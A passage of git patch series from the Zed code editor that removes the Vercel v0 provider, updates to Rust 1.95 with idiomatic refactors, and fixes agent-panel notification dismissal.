Self::VZeroOnePointFiveMedium => "v0-1.5-md", - Self::Custom { name, .. } => name, - } - } - - pub fn display_name(&self) -> &str { - match self { - Self::VZeroOnePointFiveMedium => "v0-1.5-md", - Self::Custom { - name, display_name, .. - } => display_name.as_ref().unwrap_or(name), - } - } - - pub fn max_token_count(&self) -> u64 { - match self { - Self::VZeroOnePointFiveMedium => 128_000, - Self::Custom { max_tokens, .. } => *max_tokens, - } - } - - pub fn max_output_tokens(&self) -> Option { - match self { - Self::VZeroOnePointFiveMedium => Some(32_000), - Self::Custom { - max_output_tokens, .. - } => *max_output_tokens, - } - } - - pub fn supports_parallel_tool_calls(&self) -> bool { - match self { - Self::VZeroOnePointFiveMedium => true, - Model::Custom { .. } => false, - } - } - - pub fn supports_prompt_cache_key(&self) -> bool { - false - } -} diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index b38874730ecd5b..b5dd98afe1a6b6 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -34,7 +34,6 @@ Zed supports these providers with your own API keys: - [OpenCode](#opencode) - [OpenRouter](#openrouter) - [Vercel AI Gateway](#vercel-ai-gateway) -- [Vercel](#vercel-v0) - [xAI](#xai) ### Amazon Bedrock {#amazon-bedrock} @@ -830,18 +829,6 @@ You can also set a custom endpoint for Vercel AI Gateway in your settings file: } ``` -### Vercel v0 {#vercel-v0} - -[Vercel v0](https://v0.app/docs/api/model) is a model for generating full-stack apps, with framework-aware completions for stacks like Next.js and Vercel. -It supports text and image inputs and provides fast streaming responses. - -The v0 models are [OpenAI-compatible models](#openai-api-compatible), and Vercel appears as a dedicated provider in the panel's settings view. - -To start using it with Zed, ensure you have first created a [v0 API key](https://v0.dev/chat/settings/keys). -Once you have it, paste it directly into the Vercel provider section in the panel's settings view. - -You should then find it as `v0-1.5-md` in the model dropdown in the Agent Panel. - ### xAI {#xai} Zed includes a dedicated [xAI](https://x.ai/) provider. You can use your own API key to access Grok models. From 748575d1facf4de3428b3548a5a0d656f4f903d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Yara=20=F0=9F=8F=B3=EF=B8=8F=E2=80=8D=E2=9A=A7=EF=B8=8F?= Date: Wed, 29 Apr 2026 12:27:47 +0200 Subject: [PATCH 097/231] Rust 1.95 (#55104) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- codebook.toml | 1 - crates/agent_ui/src/thread_metadata_store.rs | 4 +-- crates/dap_adapters/src/javascript.rs | 2 +- crates/debugger_ui/src/tests/console.rs | 2 +- crates/denoise/src/lib.rs | 8 ++--- crates/diagnostics/src/buffer_diagnostics.rs | 33 +++++++++---------- crates/diagnostics/src/diagnostics.rs | 9 +++-- crates/edit_prediction/src/edit_prediction.rs | 2 +- .../src/edit_prediction_tests.rs | 4 +-- .../src/filter_languages.rs | 8 ++--- crates/editor/src/display_map/block_map.rs | 4 +-- crates/editor/src/display_map/tab_map.rs | 4 +++ crates/editor/src/document_colors.rs | 8 ++--- crates/editor/src/editor.rs | 4 +-- crates/editor/src/runnables.rs | 2 +- crates/file_finder/src/file_finder.rs | 5 +-- crates/git/src/blame.rs | 2 +- crates/git_ui/src/project_diff.rs | 2 +- .../src/json_schema_store.rs | 2 +- .../src/syntax_map/syntax_map_tests.rs | 6 ++-- crates/languages/src/python.rs | 2 +- crates/multi_buffer/src/multi_buffer.rs | 5 +-- crates/multi_buffer/src/multi_buffer_tests.rs | 4 +-- crates/multi_buffer/src/path_key.rs | 2 +- crates/project/src/lsp_store.rs | 4 +-- .../tests/integration/project_tests.rs | 2 +- crates/recent_projects/src/recent_projects.rs | 2 +- crates/snippet_provider/src/lib.rs | 4 +-- crates/terminal_view/src/persistence.rs | 4 +-- crates/vim/src/helix/surround.rs | 2 +- crates/vim/src/state.rs | 2 +- crates/worktree/src/worktree.rs | 2 +- crates/zeta_prompt/src/multi_region.rs | 9 +++-- flake.lock | 6 ++-- rust-toolchain.toml | 2 +- 35 files changed, 73 insertions(+), 91 deletions(-) delete mode 100644 codebook.toml diff --git a/codebook.toml b/codebook.toml deleted file mode 100644 index 57cdd2569c350b..00000000000000 --- a/codebook.toml +++ /dev/null @@ -1 +0,0 @@ -words = ["breakpoint"] diff --git a/crates/agent_ui/src/thread_metadata_store.rs b/crates/agent_ui/src/thread_metadata_store.rs index ff6eb3b98ec67d..fee098f3760e96 100644 --- a/crates/agent_ui/src/thread_metadata_store.rs +++ b/crates/agent_ui/src/thread_metadata_store.rs @@ -162,7 +162,7 @@ fn migrate_thread_metadata(cx: &mut App) -> Task> { .push(entry); } for entries in per_project.values_mut() { - entries.sort_by(|a, b| b.updated_at.cmp(&a.updated_at)); + entries.sort_by_key(|entry| std::cmp::Reverse(entry.updated_at)); for entry in entries.iter_mut().take(5) { entry.archived = false; } @@ -2321,7 +2321,7 @@ mod tests { .filter(|m| *m.folder_paths() == project_a_paths) .collect(); assert_eq!(project_a_entries.len(), 7); - project_a_entries.sort_by(|a, b| b.updated_at.cmp(&a.updated_at)); + project_a_entries.sort_by_key(|entry| std::cmp::Reverse(entry.updated_at)); for entry in &project_a_entries[..5] { assert!( diff --git a/crates/dap_adapters/src/javascript.rs b/crates/dap_adapters/src/javascript.rs index 68f5ca7e797664..8bdcf52807b369 100644 --- a/crates/dap_adapters/src/javascript.rs +++ b/crates/dap_adapters/src/javascript.rs @@ -103,7 +103,7 @@ impl JsDebugAdapter { if let Some(env) = configuration.get("env").cloned() && let Ok(env) = serde_json::from_value::>(env) { - envs.extend(env.into_iter()); + envs.extend(env); } configuration diff --git a/crates/debugger_ui/src/tests/console.rs b/crates/debugger_ui/src/tests/console.rs index 9e672be080aad4..b3a8fb0b6b03e9 100644 --- a/crates/debugger_ui/src/tests/console.rs +++ b/crates/debugger_ui/src/tests/console.rs @@ -328,7 +328,7 @@ async fn test_escape_code_processing(executor: BackgroundExecutor, cx: &mut Test let text_highlights = editor.update(cx, |editor, cx| { let mut text_highlights = editor.all_text_highlights(window, cx).into_iter().flat_map(|(_, ranges)| ranges).collect::>(); - text_highlights.sort_by(|a, b| a.start.cmp(&b.start)); + text_highlights.sort_by_key(|hl| hl.start); text_highlights }); pretty_assertions::assert_eq!( diff --git a/crates/denoise/src/lib.rs b/crates/denoise/src/lib.rs index f6cbf0fadf1f21..e92831b9657d99 100644 --- a/crates/denoise/src/lib.rs +++ b/crates/denoise/src/lib.rs @@ -118,12 +118,8 @@ fn run_neural_denoiser( input_rx: mpsc::Receiver<[f32; BLOCK_SHIFT]>, ) { let mut engine = Engine::new(); - loop { - let Ok(sub_block) = input_rx.recv() else { - // tx must have dropped, stop thread - break; - }; - + // until tx is dropped + while let Ok(sub_block) = input_rx.recv() { let denoised_sub_block = engine.feed(&sub_block); if denoised_tx.send(denoised_sub_block).is_err() { break; diff --git a/crates/diagnostics/src/buffer_diagnostics.rs b/crates/diagnostics/src/buffer_diagnostics.rs index 040aeae4742e18..e703e193c312e9 100644 --- a/crates/diagnostics/src/buffer_diagnostics.rs +++ b/crates/diagnostics/src/buffer_diagnostics.rs @@ -542,23 +542,22 @@ impl BufferDiagnosticsEditor { // display map for the new diagnostics. Update the `blocks` // property before finishing, to ensure the blocks are removed // on the next execution. - let editor_blocks = - anchor_ranges - .into_iter() - .zip(blocks.into_iter()) - .map(|(anchor, block)| { - let editor = buffer_diagnostics_editor.editor.downgrade(); - - BlockProperties { - placement: BlockPlacement::Near(anchor.start), - height: Some(1), - style: BlockStyle::Flex, - render: Arc::new(move |block_context| { - block.render_block(editor.clone(), block_context) - }), - priority: 1, - } - }); + let editor_blocks = anchor_ranges + .into_iter() + .zip(blocks) + .map(|(anchor, block)| { + let editor = buffer_diagnostics_editor.editor.downgrade(); + + BlockProperties { + placement: BlockPlacement::Near(anchor.start), + height: Some(1), + style: BlockStyle::Flex, + render: Arc::new(move |block_context| { + block.render_block(editor.clone(), block_context) + }), + priority: 1, + } + }); let block_ids = buffer_diagnostics_editor.editor.update(cx, |editor, cx| { editor.display_map.update(cx, |display_map, cx| { diff --git a/crates/diagnostics/src/diagnostics.rs b/crates/diagnostics/src/diagnostics.rs index 49e17e69b00c60..4ee8259dd695d8 100644 --- a/crates/diagnostics/src/diagnostics.rs +++ b/crates/diagnostics/src/diagnostics.rs @@ -667,10 +667,8 @@ impl ProjectDiagnosticsEditor { } } - let editor_blocks = anchor_ranges - .into_iter() - .zip_eq(result_blocks.into_iter()) - .filter_map(|(anchor, block)| { + let editor_blocks = anchor_ranges.into_iter().zip_eq(result_blocks).filter_map( + |(anchor, block)| { let block = block?; let editor = this.editor.downgrade(); Some(BlockProperties { @@ -680,7 +678,8 @@ impl ProjectDiagnosticsEditor { render: Arc::new(move |bcx| block.render_block(editor.clone(), bcx)), priority: 1, }) - }); + }, + ); let block_ids = this.editor.update(cx, |editor, cx| { editor.display_map.update(cx, |display_map, cx| { diff --git a/crates/edit_prediction/src/edit_prediction.rs b/crates/edit_prediction/src/edit_prediction.rs index 824c45036b7fcc..6c98e296ef4256 100644 --- a/crates/edit_prediction/src/edit_prediction.rs +++ b/crates/edit_prediction/src/edit_prediction.rs @@ -2514,7 +2514,7 @@ impl EditPredictionStore { .collect() }); - candidates.sort_by(|a, b| b.1.cmp(&a.1)); + candidates.sort_by_key(|c| std::cmp::Reverse(c.1)); for (path, _) in candidates { let candidate_buffer = project diff --git a/crates/edit_prediction/src/edit_prediction_tests.rs b/crates/edit_prediction/src/edit_prediction_tests.rs index be6ea025496ee1..00d52023f4dab7 100644 --- a/crates/edit_prediction/src/edit_prediction_tests.rs +++ b/crates/edit_prediction/src/edit_prediction_tests.rs @@ -3315,8 +3315,7 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) { // Let the worker process the channel message before we start advancing. cx.run_until_parked(); - let mut region_a_edit_offset = 5; - for _ in 0..3 { + for region_a_edit_offset in (5..).take(3) { // Edit inside region A (not at the boundary) so `last_edit_at` is // updated before the worker's next wake. buffer.update(cx, |buffer, cx| { @@ -3326,7 +3325,6 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) { cx, ); }); - region_a_edit_offset += 1; cx.run_until_parked(); cx.executor() diff --git a/crates/edit_prediction_cli/src/filter_languages.rs b/crates/edit_prediction_cli/src/filter_languages.rs index 989a112a50aa2d..cdf503fa23c95d 100644 --- a/crates/edit_prediction_cli/src/filter_languages.rs +++ b/crates/edit_prediction_cli/src/filter_languages.rs @@ -168,7 +168,7 @@ fn get_all_languages(extension_map: &HashMap) -> Vec<(String, Ve } let mut result: Vec<_> = language_to_extensions.into_iter().collect(); - result.sort_by(|a, b| a.0.to_lowercase().cmp(&b.0.to_lowercase())); + result.sort_by_key(|res| res.0.to_lowercase()); for (_, extensions) in &mut result { extensions.sort(); } @@ -380,7 +380,7 @@ pub fn run_filter_languages( if let Some(top_n) = args.show_top_excluded { if !excluded_extensions.is_empty() { let mut sorted: Vec<_> = excluded_extensions.into_iter().collect(); - sorted.sort_by(|a, b| b.1.cmp(&a.1)); + sorted.sort_by_key(|res| std::cmp::Reverse(res.1)); eprintln!("\nTop {} excluded extensions:", top_n.min(sorted.len())); for (ext, count) in sorted.into_iter().take(top_n) { eprintln!(" {:>6} .{}", count, ext); @@ -439,7 +439,7 @@ fn run_stats(input: &Path, extension_map: &HashMap) -> Result<() } let mut sorted_counts: Vec<_> = language_counts.into_iter().collect(); - sorted_counts.sort_by(|a, b| b.1.cmp(&a.1)); + sorted_counts.sort_by_key(|res| std::cmp::Reverse(res.1)); println!("Language distribution ({} total examples):", total_count); println!(); @@ -452,7 +452,7 @@ fn run_stats(input: &Path, extension_map: &HashMap) -> Result<() println!(); println!("Unknown extensions:"); let mut sorted_unknown: Vec<_> = unknown_extensions.into_iter().collect(); - sorted_unknown.sort_by(|a, b| b.1.cmp(&a.1)); + sorted_unknown.sort_by_key(|res| std::cmp::Reverse(res.1)); for (ext, count) in sorted_unknown.iter().take(30) { println!(" {:>6} .{}", count, ext); } diff --git a/crates/editor/src/display_map/block_map.rs b/crates/editor/src/display_map/block_map.rs index c3dbfa4f6dd6d8..7664ff4d2d7121 100644 --- a/crates/editor/src/display_map/block_map.rs +++ b/crates/editor/src/display_map/block_map.rs @@ -4398,8 +4398,7 @@ mod tests { let mut expected_longest_rows_in_range = vec![]; let mut longest_line_len_in_range = 0; - let mut row = start_row as u32; - for line in &expected_lines[start_row..end_row] { + for (row, line) in (start_row as u32..).zip(&expected_lines[start_row..end_row]) { let line_char_count = line.chars().count() as isize; match line_char_count.cmp(&longest_line_len_in_range) { Ordering::Less => {} @@ -4410,7 +4409,6 @@ mod tests { expected_longest_rows_in_range.push(row); } } - row += 1; } let longest_row_in_range = blocks_snapshot diff --git a/crates/editor/src/display_map/tab_map.rs b/crates/editor/src/display_map/tab_map.rs index bb0e642df380e0..24f0206cccd754 100644 --- a/crates/editor/src/display_map/tab_map.rs +++ b/crates/editor/src/display_map/tab_map.rs @@ -1577,6 +1577,10 @@ mod tests { let mut all_tab_stops = Vec::new(); let mut byte_offset = 1; let mut char_offset = 1; + #[expect( + clippy::explicit_counter_loop, + reason = "Lint does not account for char_offset being needed after the loop" + )] for ch in buffer_snapshot.text().chars() { if ch == '\t' { all_tab_stops.push(TabStop { diff --git a/crates/editor/src/document_colors.rs b/crates/editor/src/document_colors.rs index d62bb87404d454..4ce89f90c996e5 100644 --- a/crates/editor/src/document_colors.rs +++ b/crates/editor/src/document_colors.rs @@ -51,8 +51,8 @@ impl LspColorData { to_remove: Vec::new(), to_insert: self .buffer_colors - .iter() - .flat_map(|(_, buffer_colors)| buffer_colors.colors.iter()) + .values() + .flat_map(|buffer_colors| buffer_colors.colors.iter()) .map(|(range, color, id)| { Inlay::color( id.id(), @@ -120,8 +120,8 @@ impl LspColorData { Vec::new() } else { self.buffer_colors - .iter() - .flat_map(|(_, buffer_colors)| &buffer_colors.colors) + .values() + .flat_map(|buffer_colors| &buffer_colors.colors) .map(|(range, color, _)| { let display_range = range.clone().to_display_points(snapshot); let color = Hsla::from(Rgba { diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index 42e4ebb606dfed..c9ca01c7878939 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -24465,8 +24465,8 @@ impl Editor { let snapshot = self.snapshot(window, cx); let mut used_highlight_orders = HashMap::default(); self.highlighted_rows - .iter() - .flat_map(|(_, highlighted_rows)| highlighted_rows.iter()) + .values() + .flat_map(|highlighted_rows| highlighted_rows.iter()) .fold( BTreeMap::::new(), |mut unique_rows, highlight| { diff --git a/crates/editor/src/runnables.rs b/crates/editor/src/runnables.rs index 25db455d462afd..7b0b4d572a5137 100644 --- a/crates/editor/src/runnables.rs +++ b/crates/editor/src/runnables.rs @@ -1288,7 +1288,7 @@ mod tests { .runnables .iter() .flat_map(|(_, (_, tasks))| { - tasks.iter().flat_map(|(_, runnable_tasks)| { + tasks.values().flat_map(|runnable_tasks| { runnable_tasks .templates .iter() diff --git a/crates/file_finder/src/file_finder.rs b/crates/file_finder/src/file_finder.rs index d75481f6f74880..66acefde69f122 100644 --- a/crates/file_finder/src/file_finder.rs +++ b/crates/file_finder/src/file_finder.rs @@ -612,10 +612,7 @@ impl Matches { // We build a sorted Vec, eliminating duplicate search matches. // Search matches with the same paths should have equal `ProjectPanelOrdMatch`, so we should // not have any duplicates after building the final list. - for new_match in new_history_matches - .into_values() - .chain(new_search_matches.into_iter()) - { + for new_match in new_history_matches.into_values().chain(new_search_matches) { match self.position(&new_match, currently_opened) { Ok(_duplicate) => continue, Err(i) => { diff --git a/crates/git/src/blame.rs b/crates/git/src/blame.rs index 7597e29aee8604..43627453f0ff2b 100644 --- a/crates/git/src/blame.rs +++ b/crates/git/src/blame.rs @@ -29,7 +29,7 @@ impl Blame { ) -> Result { let output = run_git_blame(git, path, content, line_ending).await?; let mut entries = parse_git_blame(&output)?; - entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); + entries.sort_unstable_by_key(|entry| entry.range.start); let mut unique_shas = HashSet::default(); diff --git a/crates/git_ui/src/project_diff.rs b/crates/git_ui/src/project_diff.rs index 67d9a96b2d6746..3301fbc66f76fd 100644 --- a/crates/git_ui/src/project_diff.rs +++ b/crates/git_ui/src/project_diff.rs @@ -822,7 +822,7 @@ impl ProjectDiff { let mut buffers_to_fold = Vec::new(); - for (entry, path_key) in buffers_to_load.into_iter().zip(path_keys.into_iter()) { + for (entry, path_key) in buffers_to_load.into_iter().zip(path_keys) { if let Some((buffer, diff)) = entry.load.await.log_err() { // We might be lagging behind enough that all future entry.load futures are no longer pending. // If that is the case, this task will never yield, starving the foreground thread of execution time. diff --git a/crates/json_schema_store/src/json_schema_store.rs b/crates/json_schema_store/src/json_schema_store.rs index b0cd3c0b35c7ff..afe6c51e81182b 100644 --- a/crates/json_schema_store/src/json_schema_store.rs +++ b/crates/json_schema_store/src/json_schema_store.rs @@ -313,7 +313,7 @@ async fn resolve_dynamic_schema( .all_lsp_adapters() .into_iter() .map(|adapter| adapter.name()) - .chain(languages.available_lsp_adapter_names().into_iter()) + .chain(languages.available_lsp_adapter_names()) .map(|name| name.to_string()) .collect(); diff --git a/crates/language/src/syntax_map/syntax_map_tests.rs b/crates/language/src/syntax_map/syntax_map_tests.rs index 247076b6f25e3c..8bff7ce1415c00 100644 --- a/crates/language/src/syntax_map/syntax_map_tests.rs +++ b/crates/language/src/syntax_map/syntax_map_tests.rs @@ -1163,7 +1163,7 @@ fn test_random_edits( let layers = syntax_map.layers(&buffer); let reference_layers = reference_syntax_map.layers(&buffer); - for (edited_layer, reference_layer) in layers.into_iter().zip(reference_layers.into_iter()) { + for (edited_layer, reference_layer) in layers.into_iter().zip(reference_layers) { assert_eq!( edited_layer.node().to_sexp(), reference_layer.node().to_sexp() @@ -1326,9 +1326,7 @@ fn test_edit_sequence(language_name: &str, steps: &[&str], cx: &mut App) -> (Buf reference_layers.len(), "wrong number of layers at step {i}" ); - for (edited_layer, reference_layer) in - mutated_layers.into_iter().zip(reference_layers.into_iter()) - { + for (edited_layer, reference_layer) in mutated_layers.into_iter().zip(reference_layers) { assert_eq!( edited_layer.node().to_sexp(), reference_layer.node().to_sexp(), diff --git a/crates/languages/src/python.rs b/crates/languages/src/python.rs index dd059313b6d4f3..5cdff8654ff6b9 100644 --- a/crates/languages/src/python.rs +++ b/crates/languages/src/python.rs @@ -895,7 +895,7 @@ impl ContextProvider for PythonContextProvider { Ok(task::TaskVariables::from_iter( test_target .into_iter() - .chain(module_target.into_iter()) + .chain(module_target) .chain([toolchain]), )) }) diff --git a/crates/multi_buffer/src/multi_buffer.rs b/crates/multi_buffer/src/multi_buffer.rs index 8b7b1002d96dac..de0a43bac914a8 100644 --- a/crates/multi_buffer/src/multi_buffer.rs +++ b/crates/multi_buffer/src/multi_buffer.rs @@ -3575,10 +3575,7 @@ impl MultiBufferSnapshot { continue 'anchors; }; cursor.seek_forward(path, Bias::Left); - 'excerpts: loop { - let Some(excerpt) = cursor.item() else { - break; - }; + 'excerpts: while let Some(excerpt) = cursor.item() { if excerpt.path_key != *path { break; } diff --git a/crates/multi_buffer/src/multi_buffer_tests.rs b/crates/multi_buffer/src/multi_buffer_tests.rs index a7f4b18cc42395..2f4046b8601f8a 100644 --- a/crates/multi_buffer/src/multi_buffer_tests.rs +++ b/crates/multi_buffer/src/multi_buffer_tests.rs @@ -2955,7 +2955,7 @@ impl ReferenceMultibuffer { }) .collect::>(); - new_ranges.sort_by(|l, r| l.context.start.cmp(&r.context.start)); + new_ranges.sort_by_key(|nr| nr.context.start); self.set_excerpts( path.unwrap(), @@ -3899,7 +3899,7 @@ fn mutate_excerpt_ranges( } existing_ranges.extend(ranges_to_add); - existing_ranges.sort_by(|l, r| l.start.cmp(&r.start)); + existing_ranges.sort_by_key(|r| r.start); } fn check_multibuffer( diff --git a/crates/multi_buffer/src/path_key.rs b/crates/multi_buffer/src/path_key.rs index 3af1d5be32cf3a..a2fd1ae26461b6 100644 --- a/crates/multi_buffer/src/path_key.rs +++ b/crates/multi_buffer/src/path_key.rs @@ -311,7 +311,7 @@ impl MultiBuffer { cursor.next(); } - ranges.sort_by(|l, r| l.context.start.cmp(&r.context.start)); + ranges.sort_by_key(|r| r.context.start); self.set_excerpt_ranges_for_path(path.clone(), buffer, buffer_snapshot, ranges, cx); } diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index 13d1cd90f47762..01aab2be7ac039 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -2969,8 +2969,8 @@ impl LocalLspStore { .flat_map(|(worktree_id, servers)| { servers .roots - .iter() - .flat_map(|(_, language_servers)| language_servers) + .values() + .flatten() .map(move |(_, (server_node, server_languages))| { (worktree_id, server_node, server_languages) }) diff --git a/crates/project/tests/integration/project_tests.rs b/crates/project/tests/integration/project_tests.rs index 6997435eb2a215..c512c893cc4551 100644 --- a/crates/project/tests/integration/project_tests.rs +++ b/crates/project/tests/integration/project_tests.rs @@ -10520,7 +10520,7 @@ fn merge_pending_ops_snapshots( t_ops.ops.push(s_op); } } - t_ops.ops.sort_by(|l, r| l.id.cmp(&r.id)); + t_ops.ops.sort_by_key(|op| op.id); } else { target.push(s_ops); } diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index b8df94c0230367..b93fa009fce193 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -220,7 +220,7 @@ fn get_open_folders(workspace: &Workspace, cx: &App) -> Vec { }) .collect(); - entries.sort_by(|a, b| a.name.to_lowercase().cmp(&b.name.to_lowercase())); + entries.sort_by_key(|entry| entry.name.to_lowercase()); entries } diff --git a/crates/snippet_provider/src/lib.rs b/crates/snippet_provider/src/lib.rs index 7edacb9af68d45..e51205678b1472 100644 --- a/crates/snippet_provider/src/lib.rs +++ b/crates/snippet_provider/src/lib.rs @@ -219,8 +219,8 @@ impl SnippetProvider { .get(language) .cloned() .unwrap_or_default() - .into_iter() - .flat_map(|(_, snippets)| snippets.into_iter()) + .into_values() + .flat_map(|snippets| snippets.into_iter()) .collect(); if LOOKUP_GLOBALS { if let Some(global_watcher) = cx.try_global::() { diff --git a/crates/terminal_view/src/persistence.rs b/crates/terminal_view/src/persistence.rs index 50b1e350fa91a4..5c1e659b0f30bf 100644 --- a/crates/terminal_view/src/persistence.rs +++ b/crates/terminal_view/src/persistence.rs @@ -147,14 +147,12 @@ fn populate_pane_items( window: &mut Window, cx: &mut Context, ) { - let mut item_index = pane.items_len(); let mut active_item_index = None; - for item in items { + for (item_index, item) in (pane.items_len()..).zip(items) { if Some(item.item_id().as_u64()) == active_item { active_item_index = Some(item_index); } pane.add_item(Box::new(item), false, false, None, window, cx); - item_index += 1; } if let Some(index) = active_item_index { pane.activate_item(index, false, false, window, cx); diff --git a/crates/vim/src/helix/surround.rs b/crates/vim/src/helix/surround.rs index a1aa7b21afec0b..976a27390b3009 100644 --- a/crates/vim/src/helix/surround.rs +++ b/crates/vim/src/helix/surround.rs @@ -82,7 +82,7 @@ fn apply_helix_surround_edits( let selections = editor.selections.all_display(&display_map); let (mut edits, anchors) = build(&display_map, selections); - edits.sort_by(|a, b| b.0.start.cmp(&a.0.start)); + edits.sort_by_key(|edit| edit.0.start); editor.edit(edits, cx); editor.change_selections(Default::default(), window, cx, |s| { diff --git a/crates/vim/src/state.rs b/crates/vim/src/state.rs index 3bd4c0a5b804c1..3ca4d704c7ced6 100644 --- a/crates/vim/src/state.rs +++ b/crates/vim/src/state.rs @@ -1411,7 +1411,7 @@ impl RegistersView { }) } }); - matches.sort_by(|a, b| a.name.cmp(&b.name)); + matches.sort_by_key(|m| m.name); let delegate = RegistersViewDelegate { selected_index: 0, matches, diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index 3f58448d312ae6..c34f358bc84562 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -5019,7 +5019,7 @@ impl BackgroundScanner { } } - for (path, metadata) in relative_paths.iter().zip(metadata.into_iter()) { + for (path, metadata) in relative_paths.iter().zip(metadata) { let abs_path: Arc = root_abs_path.join(path.as_std_path()).into(); match metadata { Ok(Some((metadata, canonical_path))) => { diff --git a/crates/zeta_prompt/src/multi_region.rs b/crates/zeta_prompt/src/multi_region.rs index 5bd486df767aac..be416b513fa7b1 100644 --- a/crates/zeta_prompt/src/multi_region.rs +++ b/crates/zeta_prompt/src/multi_region.rs @@ -611,11 +611,10 @@ fn map_boundary_offset( .saturating_sub(span_common_prefix) .saturating_sub(span_common_suffix); - if old_changed_len == 0 { - new_changed_start - } else { - new_changed_start + ((old_rel - old_changed_start) * new_changed_len / old_changed_len) - } + new_changed_start + + ((old_rel - old_changed_start) * new_changed_len) + .checked_div(old_changed_len) + .unwrap_or(new_changed_len) } } diff --git a/flake.lock b/flake.lock index c32629aedd5330..7466ae522713d9 100644 --- a/flake.lock +++ b/flake.lock @@ -79,11 +79,11 @@ ] }, "locked": { - "lastModified": 1775013181, - "narHash": "sha256-zPrt6oNM1r/RO5bWYaZ3hthfG9vzkr6kQdoqDd5x4Qw=", + "lastModified": 1777346187, + "narHash": "sha256-oVxyGjpiIsrXhWTJVUOs38fZQkLjd0nZGOY9K7Kfot8=", "owner": "oxalica", "repo": "rust-overlay", - "rev": "e8046c1d9ccadd497c2344d8fa49dab62f22f7be", + "rev": "146e7bf7569b8288f24d41d806b9f584f7cfd5b5", "type": "github" }, "original": { diff --git a/rust-toolchain.toml b/rust-toolchain.toml index 15b4a8f0fc9f93..2dd2a0e6716331 100644 --- a/rust-toolchain.toml +++ b/rust-toolchain.toml @@ -1,5 +1,5 @@ [toolchain] -channel = "1.94.1" +channel = "1.95.0" profile = "minimal" components = [ "rustfmt", "clippy", "rust-analyzer", "rust-src" ] targets = [ From 60b9def5170222fd7b4128143864afa519a434f9 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Wed, 29 Apr 2026 13:33:34 +0200 Subject: [PATCH 098/231] Fix the thread completion notification not dismissing when focusing the panel (#55188) Before: https://github.com/user-attachments/assets/2ea0f1ed-5189-4b27-8b1e-3f47d7684a28 After: https://github.com/user-attachments/assets/535d47b6-d6dc-41cd-a14e-d2f5d6b5a3a5 Release Notes: - Fixed the thread completion notification not dismissing when focusing the panel --- crates/agent_ui/src/conversation_view.rs | 156 ++++++++++++++++++++--- 1 file changed, 141 insertions(+), 15 deletions(-) diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index 3b2381f1c20747..c6ce183863ba84 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -88,7 +88,7 @@ use crate::profile_selector::{ProfileProvider, ProfileSelector}; use crate::thread_metadata_store::{ThreadId, ThreadMetadataStore}; use crate::ui::{AgentNotification, AgentNotificationEvent}; use crate::{ - Agent, AgentDiffPane, AgentInitialContent, AgentPanel, AllowAlways, AllowOnce, + Agent, AgentDiffPane, AgentInitialContent, AgentPanel, AgentPanelEvent, AllowAlways, AllowOnce, AuthorizeToolCall, ClearMessageQueue, CycleFavoriteModels, CycleModeSelector, CycleThinkingEffort, EditFirstQueuedMessage, ExpandMessageEditor, Follow, KeepAll, NewThread, OpenAddContextMenu, OpenAgentDiff, RejectAll, RejectOnce, RemoveFirstQueuedMessage, @@ -2656,23 +2656,61 @@ impl ConversationView { self.notifications.push(screen_window); - // If the user manually refocuses the original window, dismiss the popup. - self.notification_subscriptions + let dismiss_if_visible = { + let pop_up_weak = pop_up.downgrade(); + move |this: &ConversationView, + window: &mut Window, + cx: &mut Context| { + if this.agent_status_visible(window, cx) + && let Some(pop_up) = pop_up_weak.upgrade() + { + pop_up.update(cx, |notification, cx| { + notification.dismiss(cx); + }); + } + } + }; + + let subscriptions = self + .notification_subscriptions .entry(screen_window) - .or_insert_with(Vec::new) - .push({ - let pop_up_weak = pop_up.downgrade(); + .or_insert_with(Vec::new); - cx.observe_window_activation(window, move |this, window, cx| { - if this.agent_status_visible(window, cx) - && let Some(pop_up) = pop_up_weak.upgrade() - { - pop_up.update(cx, |notification, cx| { - notification.dismiss(cx); - }); + subscriptions.push({ + let dismiss_if_visible = dismiss_if_visible.clone(); + cx.observe_window_activation(window, move |this, window, cx| { + dismiss_if_visible(this, window, cx); + }) + }); + + if let Some(multi_workspace) = window.root::().flatten() { + let dismiss_if_visible = dismiss_if_visible.clone(); + subscriptions.push(cx.observe_in( + &multi_workspace, + window, + move |this, _, window, cx| { + dismiss_if_visible(this, window, cx); + }, + )); + } + + if let Some(panel) = self + .workspace + .upgrade() + .and_then(|workspace| workspace.read(cx).panel::(cx)) + { + subscriptions.push(cx.subscribe_in( + &panel, + window, + move |this, _, event: &AgentPanelEvent, window, cx| match event { + AgentPanelEvent::ActiveViewChanged | AgentPanelEvent::ThreadFocused => { + dismiss_if_visible(this, window, cx); } - }) - }); + AgentPanelEvent::RetainedThreadChanged + | AgentPanelEvent::ThreadInteracted { .. } => {} + }, + )); + } } } @@ -3889,6 +3927,94 @@ pub(crate) mod tests { ); } + #[gpui::test] + async fn test_notification_dismissed_when_sidebar_opens(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + + cx.update(|cx| { + cx.update_flags(true, vec!["agent-v2".to_string()]); + agent::ThreadStore::init_global(cx); + 